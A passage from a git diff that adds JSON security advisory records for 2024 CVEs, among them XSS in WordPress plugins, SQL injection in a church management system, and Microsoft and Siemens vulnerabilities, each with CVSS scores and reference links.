"https://nvd.nist.gov/vuln/detail/CVE-2024-30659" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30659" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T07:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-x5g3-vjqh-jg6c/GHSA-x5g3-vjqh-jg6c.json b/advisories/unreviewed/2024/04/GHSA-x5g3-vjqh-jg6c/GHSA-x5g3-vjqh-jg6c.json new file mode 100644 index 00000000000..df543768fd2 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-x5g3-vjqh-jg6c/GHSA-x5g3-vjqh-jg6c.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x5g3-vjqh-jg6c", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-30730" + ], + "details": "An insecure logging vulnerability has been identified within ROS Kinetic Kame in ROS_VERSION 1 and ROS_ PYTHON_VERSION 3, allows attackers to obtain sensitive information via inadequate security measures implemented within the logging mechanisms of ROS.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30730" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30730" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T05:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-x67v-qcqh-2rvg/GHSA-x67v-qcqh-2rvg.json b/advisories/unreviewed/2024/04/GHSA-x67v-qcqh-2rvg/GHSA-x67v-qcqh-2rvg.json new file mode 100644 index 00000000000..96e21b23964 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-x67v-qcqh-2rvg/GHSA-x67v-qcqh-2rvg.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x67v-qcqh-2rvg", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2325" + ], + "details": "The Link Library plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the searchll parameter in all versions up to, and including, 7.6.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2325" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3050134/link-library" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b93af9cc-cd9a-4bbb-8cb1-bf45c59e469c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-x6h6-66j7-3gwr/GHSA-x6h6-66j7-3gwr.json b/advisories/unreviewed/2024/04/GHSA-x6h6-66j7-3gwr/GHSA-x6h6-66j7-3gwr.json new file mode 100644 index 00000000000..cfb1b1663ef --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-x6h6-66j7-3gwr/GHSA-x6h6-66j7-3gwr.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x6h6-66j7-3gwr", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-3539" + ], + "details": "A vulnerability was found in Campcodes Church Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/addgiving.php. The manipulation of the argument amount leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259909 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3539" + }, + { + "type": "WEB", + "url": "https://github.com/E1CHO/cve_hub/blob/main/Church%20Management%20System/Church%20Management%20System%20-%20vuln%206.pdf" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259909" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259909" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312540" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T05:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-x6hw-w2wh-qw7c/GHSA-x6hw-w2wh-qw7c.json b/advisories/unreviewed/2024/04/GHSA-x6hw-w2wh-qw7c/GHSA-x6hw-w2wh-qw7c.json new file mode 100644 index 00000000000..4ee9a45861a --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-x6hw-w2wh-qw7c/GHSA-x6hw-w2wh-qw7c.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x6hw-w2wh-qw7c", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-3540" + ], + "details": "A vulnerability was found in Campcodes Church Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/add_sundaysch.php. The manipulation of the argument Gender leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-259910 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3540" + }, + { + "type": "WEB", + "url": "https://github.com/E1CHO/cve_hub/blob/main/Church%20Management%20System/Church%20Management%20System%20-%20vuln%207.pdf" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259910" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259910" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312541" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T05:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-x6pg-hxcx-rghj/GHSA-x6pg-hxcx-rghj.json b/advisories/unreviewed/2024/04/GHSA-x6pg-hxcx-rghj/GHSA-x6pg-hxcx-rghj.json new file mode 100644 index 00000000000..0038e8424d2 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-x6pg-hxcx-rghj/GHSA-x6pg-hxcx-rghj.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x6pg-hxcx-rghj", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-3541" + ], + "details": "A vulnerability classified as problematic has been found in Campcodes Church Management System 1.0. This affects an unknown part of the file /admin/admin_user.php. The manipulation of the argument firstname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259911.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3541" + }, + { + "type": "WEB", + "url": "https://github.com/E1CHO/cve_hub/blob/main/Church%20Management%20System/Church%20Management%20System%20-%20vuln%208.pdf" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259911" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259911" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312542" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T06:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-x723-q7ww-gm79/GHSA-x723-q7ww-gm79.json b/advisories/unreviewed/2024/04/GHSA-x723-q7ww-gm79/GHSA-x723-q7ww-gm79.json new file mode 100644 index 00000000000..cd473fe1a7f --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-x723-q7ww-gm79/GHSA-x723-q7ww-gm79.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x723-q7ww-gm79", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2186" + ], + "details": "The Beaver Builder Addons by WPZOOM plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Team Members widget in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2186" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3046905/wpzoom-addons-for-beaver-builder" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/746385e0-6bb9-47f2-a3e7-72f8e28be731?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-x767-6775-vv77/GHSA-x767-6775-vv77.json b/advisories/unreviewed/2024/04/GHSA-x767-6775-vv77/GHSA-x767-6775-vv77.json new file mode 100644 index 00000000000..1234817a009 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-x767-6775-vv77/GHSA-x767-6775-vv77.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x767-6775-vv77", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26217" + ], + "details": "Windows Remote Access Connection Manager Information Disclosure Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26217" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26217" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-x866-v2pc-mx93/GHSA-x866-v2pc-mx93.json b/advisories/unreviewed/2024/04/GHSA-x866-v2pc-mx93/GHSA-x866-v2pc-mx93.json new file mode 100644 index 00000000000..0586051aaf4 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-x866-v2pc-mx93/GHSA-x866-v2pc-mx93.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x866-v2pc-mx93", + "modified": "2024-04-09T09:31:11Z", + "published": "2024-04-09T09:31:11Z", + "aliases": [ + "CVE-2024-30190" + ], + "details": "A vulnerability has been identified in SCALANCE W1748-1 M12 (6GK5748-1GY01-0AA0), SCALANCE W1748-1 M12 (6GK5748-1GY01-0TA0), SCALANCE W1788-1 M12 (6GK5788-1GY01-0AA0), SCALANCE W1788-2 EEC M12 (6GK5788-2GY01-0TA0), SCALANCE W1788-2 M12 (6GK5788-2GY01-0AA0), SCALANCE W1788-2IA M12 (6GK5788-2HY01-0AA0), SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AA0), SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AA0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AC0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA6), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AB0), SCALANCE W734-1 RJ45 (USA) (6GK5734-1FX00-0AB6), SCALANCE W738-1 M12 (6GK5738-1GY00-0AA0), SCALANCE W738-1 M12 (6GK5738-1GY00-0AB0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AA0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AB0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AA0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AB0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AA0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AB0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TA0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA6), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AC0), SCALANCE W774-1 RJ45 (USA) (6GK5774-1FX00-0AB6), SCALANCE W778-1 M12 (6GK5778-1GY00-0AA0), SCALANCE W778-1 M12 (6GK5778-1GY00-0AB0), SCALANCE W778-1 M12 EEC (6GK5778-1GY00-0TA0), SCALANCE W778-1 M12 EEC (USA) (6GK5778-1GY00-0TB0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AA0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AA0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AC0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AA0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AB0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AA0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AB0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AA0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AB0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AA0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AB0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AA0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TA0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TC0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AA0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AB0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AC0), SCALANCE WAM763-1 (6GK5763-1AL00-7DA0), SCALANCE WAM766-1 (EU) (6GK5766-1GE00-7DA0), SCALANCE WAM766-1 (US) (6GK5766-1GE00-7DB0), SCALANCE WAM766-1 EEC (EU) (6GK5766-1GE00-7TA0), SCALANCE WAM766-1 EEC (US) (6GK5766-1GE00-7TB0), SCALANCE WUM763-1 (6GK5763-1AL00-3AA0), SCALANCE WUM763-1 (6GK5763-1AL00-3DA0), SCALANCE WUM766-1 (EU) (6GK5766-1GE00-3DA0), SCALANCE WUM766-1 (US) (6GK5766-1GE00-3DB0). This CVE refers to Scenario 2 \"Abuse the queue for network disruptions\" of CVE-2022-47522.\n\nAffected devices can be tricked into enabling its power-saving mechanisms for a victim client. This could allow a physically proximate attacker to execute disconnection and denial-of-service attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30190" + }, + { + "type": "WEB", + "url": "https://cert-portal.siemens.com/productcert/html/ssa-457702.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-290" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T09:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-x8m6-m5rq-285x/GHSA-x8m6-m5rq-285x.json b/advisories/unreviewed/2024/04/GHSA-x8m6-m5rq-285x/GHSA-x8m6-m5rq-285x.json new file mode 100644 index 00000000000..05f224a0940 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-x8m6-m5rq-285x/GHSA-x8m6-m5rq-285x.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x8m6-m5rq-285x", + "modified": "2024-04-08T03:30:52Z", + "published": "2024-04-08T03:30:52Z", + "aliases": [ + "CVE-2023-52534" + ], + "details": "In ngmm, there is a possible undefined behavior due to incorrect error handling. This could lead to remote denial of service with no additional execution privileges needed", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52534" + }, + { + "type": "WEB", + "url": "https://www.unisoc.com/en_us/secy/announcementDetail/1777148475750809602" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T03:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-x8rm-m93r-jqp2/GHSA-x8rm-m93r-jqp2.json b/advisories/unreviewed/2024/04/GHSA-x8rm-m93r-jqp2/GHSA-x8rm-m93r-jqp2.json new file mode 100644 index 00000000000..42ccf0d63b5 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-x8rm-m93r-jqp2/GHSA-x8rm-m93r-jqp2.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x8rm-m93r-jqp2", + "modified": "2024-04-05T21:32:42Z", + "published": "2024-04-05T21:32:42Z", + "aliases": [ + "CVE-2024-27232" + ], + "details": "In asn1_ec_pkey_parse of asn1_common.c, there is a possible OOB read due to a missing null check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27232" + }, + { + "type": "WEB", + "url": "https://source.android.com/security/bulletin/pixel/2024-04-01" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T20:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-x8rv-vr65-phwh/GHSA-x8rv-vr65-phwh.json b/advisories/unreviewed/2024/04/GHSA-x8rv-vr65-phwh/GHSA-x8rv-vr65-phwh.json new file mode 100644 index 00000000000..2d5bce0c967 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-x8rv-vr65-phwh/GHSA-x8rv-vr65-phwh.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x8rv-vr65-phwh", + "modified": "2024-04-08T09:31:13Z", + "published": "2024-04-08T09:31:13Z", + "aliases": [ + "CVE-2023-52543" + ], + "details": "Permission verification vulnerability in the system module.\nImpact: Successful exploitation of this vulnerability will affect availability.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52543" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/3" + }, + { + "type": "WEB", + "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202403-0000001667644725" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T09:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-x9g4-2m6v-c5cx/GHSA-x9g4-2m6v-c5cx.json b/advisories/unreviewed/2024/04/GHSA-x9g4-2m6v-c5cx/GHSA-x9g4-2m6v-c5cx.json new file mode 100644 index 00000000000..c2d35b9048d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-x9g4-2m6v-c5cx/GHSA-x9g4-2m6v-c5cx.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x9g4-2m6v-c5cx", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-2845" + ], + "details": "The BetterDocs – Best Documentation, FAQ & Knowledge Base Plugin with AI Support & Instant Answer For Elementor & Gutenberg plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 3.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2845" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3057976%40betterdocs%2Ftrunk&old=3055881%40betterdocs%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2d113191-b550-4752-b536-644206ab56c1?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-xcx5-wxfr-wq9r/GHSA-xcx5-wxfr-wq9r.json b/advisories/unreviewed/2024/04/GHSA-xcx5-wxfr-wq9r/GHSA-xcx5-wxfr-wq9r.json new file mode 100644 index 00000000000..549508cf336 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-xcx5-wxfr-wq9r/GHSA-xcx5-wxfr-wq9r.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xcx5-wxfr-wq9r", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26195" + ], + "details": "DHCP Server Service Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26195" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26195" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-xcxv-67v8-jc88/GHSA-xcxv-67v8-jc88.json b/advisories/unreviewed/2024/04/GHSA-xcxv-67v8-jc88/GHSA-xcxv-67v8-jc88.json new file mode 100644 index 00000000000..c4539e4f85e --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-xcxv-67v8-jc88/GHSA-xcxv-67v8-jc88.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xcxv-67v8-jc88", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28919" + ], + "details": "Secure Boot Security Feature Bypass Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28919" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28919" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-693" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-xg42-vmfr-25f3/GHSA-xg42-vmfr-25f3.json b/advisories/unreviewed/2024/04/GHSA-xg42-vmfr-25f3/GHSA-xg42-vmfr-25f3.json new file mode 100644 index 00000000000..043ca500010 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-xg42-vmfr-25f3/GHSA-xg42-vmfr-25f3.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xg42-vmfr-25f3", + "modified": "2024-04-06T09:31:02Z", + "published": "2024-04-06T09:31:02Z", + "aliases": [ + "CVE-2024-2949" + ], + "details": "The Carousel, Slider, Gallery by WP Carousel – Image Carousel & Photo Gallery, Post Carousel & Post Grid, Product Carousel & Product Grid for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the carousel widget in all versions up to, and including, 2.6.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2949" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3065296%40wp-carousel-free&new=3065296%40wp-carousel-free&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9349208c-3e86-4ec6-9e10-5ecaa4923922?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T07:15:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-xgm2-9pcq-75hg/GHSA-xgm2-9pcq-75hg.json b/advisories/unreviewed/2024/04/GHSA-xgm2-9pcq-75hg/GHSA-xgm2-9pcq-75hg.json new file mode 100644 index 00000000000..fb94151665f --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-xgm2-9pcq-75hg/GHSA-xgm2-9pcq-75hg.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xgm2-9pcq-75hg", + "modified": "2024-04-07T18:30:30Z", + "published": "2024-04-07T18:30:30Z", + "aliases": [ + "CVE-2024-31345" + ], + "details": "Unrestricted Upload of File with Dangerous Type vulnerability in Sukhchain Singh Auto Poster.This issue affects Auto Poster: from n/a through 1.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31345" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/auto-poster/wordpress-auto-poster-plugin-1-2-arbitrary-file-upload-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T18:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-xgv9-xhqv-rqvg/GHSA-xgv9-xhqv-rqvg.json b/advisories/unreviewed/2024/04/GHSA-xgv9-xhqv-rqvg/GHSA-xgv9-xhqv-rqvg.json new file mode 100644 index 00000000000..dfba7271362 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-xgv9-xhqv-rqvg/GHSA-xgv9-xhqv-rqvg.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xgv9-xhqv-rqvg", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28940" + ], + "details": "Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + 